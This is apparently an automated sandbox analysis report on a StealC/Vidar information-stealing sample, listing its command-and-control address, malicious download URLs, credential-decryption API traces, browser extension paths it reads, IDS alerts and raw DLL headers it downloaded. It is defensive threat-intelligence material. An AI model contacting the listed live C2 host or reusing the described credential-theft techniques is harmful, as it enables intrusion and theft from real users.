Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.320000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.320000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00329B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00329B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0032C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00327240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00327240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00329AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00329AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00338EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00338EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00334910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0032E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00333EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003216D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0032ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00334570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032DE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:27 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:29 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 